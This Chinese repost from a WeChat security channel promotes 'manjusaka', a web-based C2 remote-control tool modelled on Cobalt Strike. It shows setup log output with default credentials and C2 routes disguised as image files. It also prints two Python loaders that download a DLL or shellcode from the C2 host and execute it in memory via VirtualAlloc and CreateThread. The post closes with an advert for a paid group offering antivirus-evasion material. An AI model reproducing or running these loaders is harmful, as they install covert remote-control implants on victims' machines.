现在只对常读和星标的公众号才展示大图推送,建议大家能把渗透安全团队“设为星标”,否则可能就看不到了啦!
0x01 工具介绍
一款基于WEB界面的仿CobaltStrike C2远控。
0x02 安装与使用
1、配置conf.toml 运行主文件
[ ]
[2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5 ]
[2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面 ]
[2022/09/14 15:57:21 监听项目路由: VHOS5vqN ]
[2022/09/14 15:57:21 NPS监听地址 :3200 ]
[2022/09/14 15:57:21 NPU后台地址 : manjusaka ]
[2022/09/14 15:57:21 NPC监听地址 :801 ]
[2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico ]
[2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg ]
[2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png ]
2、访问地址为
http://192.168.93.217:3200/manjusaka
3、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc母体dll,或者使用shellcode内存加载的形式
import requests
from ctypes import cdll
res = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg")
with open("a.dll","wb") as f:
f.write(res.content)
cdll.LoadLibrary("a.dll").main()
import requests
import ctypes
shellcode = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg").content
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
0x03 链接下载
翻到文章最底部点击“阅读原文”下载链接
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
原文始发于微信公众号(渗透安全团队):基于WEB界面的远程主机管理工具 | manjusaka
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论